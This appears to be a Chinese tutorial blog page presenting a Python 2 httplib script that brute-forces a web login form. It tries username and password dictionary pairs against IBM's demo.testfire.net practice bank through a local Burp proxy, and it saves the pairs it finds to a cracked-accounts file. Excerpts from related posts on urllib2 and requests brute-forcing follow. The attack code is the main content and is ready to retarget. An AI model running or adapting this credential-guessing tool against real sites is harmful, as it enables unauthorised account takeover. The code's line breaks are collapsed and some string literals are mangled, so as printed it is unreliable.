摘要:包含了爆破的表单的使用方法中代理的添加方法添加代理代理本地监听一个端口目的是查看发包和回包的情况测试网站为的靶机网站页面返回的页面找到个账号密码
httplib:
包含了 httplib爆破 web 的 form 表单的使用方法
httplib 中代理的添加方法
</>复制代码
# -*- coding: utf-8 -*-import urllibimport httplibimport reheaders = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded", "Referer": "http://demo.testfire.net/bank/login.aspx"}def brute_force(user, password): #添加代理 conn = httplib.HTTPConnection("localhost","8080") # 代理,本地 burp 监听一个8080端口,目的是查看发包和回包的情况 data = {"uid": user, "passw": password,"btnSubmit":"Login"} params = urllib.urlencode(data) #测试网站为 IBM 的靶机网站 page = conn.request("POST", "http://demo.testfire.net/bank/login.aspx", params, headers=headers) # request页面 response = conn.getresponse()#返回的页面 status = response.status if status==302: print "---- find user:", user, " with password:",password, "-----"+"" outFile.write(user + ":" + password + "") else: print "----- error user:", user.replace("",""), " with password:",password.replace("","") , "-----" returnoutFile = open("accounts-cracked.txt", "w")if __name__ == "__main__": with open("user.dic", "r") as userline: y = userline.readlines() with open("pass.dic", "r") as passline: b= passline.readlines() for u in y: for p in b: brute_force(user=u.replace("",""),password=p.replace("",""))outFile.close()with open("accounts-cracked.txt","r") as text: list = text.readlines() sum=len(list)if sum>0: print "找到",sum,"个账号密码"else: print "All thread OK,maybe not "
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/44356.html
摘要:包含了爆破的表单的使用方法中代理的添加方法添加代理代理本地监听一个端口目的是查看发包和回包的情况测试网站为的靶机网站页面返回的页面找到个账号密码 httplib: 包含了 httplib爆破 web 的 form 表单的使用方法 httplib 中代理的添加方法 # -*- coding: utf-8 -*- import urllib import httplib import ...
摘要:的中模块在表单爆破的使用方法模块中代理的使用方式模块是中比较全的模块简单易用比之前文章中使用的都要好用可以替换为的方法方法用于移除字符串头尾指定的字符默认为空格添加代理本地端口的代理是工具主要是查看脚本发包回包的情况好定位问题如 python 的 http 中 request模块在web 表单爆破的使用方法 request模块中代理的使用方式 request 模块是http 中比较全...
摘要:的中模块在表单爆破的使用方法模块中代理的使用方式模块是中比较全的模块简单易用比之前文章中使用的都要好用可以替换为的方法方法用于移除字符串头尾指定的字符默认为空格添加代理本地端口的代理是工具主要是查看脚本发包回包的情况好定位问题如 python 的 http 中 request模块在web 表单爆破的使用方法 request模块中代理的使用方式 request 模块是http 中比较全...
摘要:导入用户名字典导入密码的字典找到个账号密码输入有点丑将就用下 python 的 http 中 urllib2和 urllib模块在web 表单爆破的使用方法 脚本中还增加了 urllib2和 urllib模块如何添加代理的方法 # -*- coding: utf-8 -*- import urllib2 import urllib import time def brute_f...
摘要:导入用户名字典导入密码的字典找到个账号密码输入有点丑将就用下 python 的 http 中 urllib2和 urllib模块在web 表单爆破的使用方法 脚本中还增加了 urllib2和 urllib模块如何添加代理的方法 # -*- coding: utf-8 -*- import urllib2 import urllib import time def brute_f...
阅读 2010·2021-09-28 09:43
阅读 1291·2021-09-23 11:22
阅读 2937·2021-09-14 18:05
阅读 1963·2019-08-30 15:52
阅读 2997·2019-08-30 10:55
阅读 2186·2019-08-29 16:58
阅读 1575·2019-08-29 16:37
阅读 3184·2019-08-29 16:25
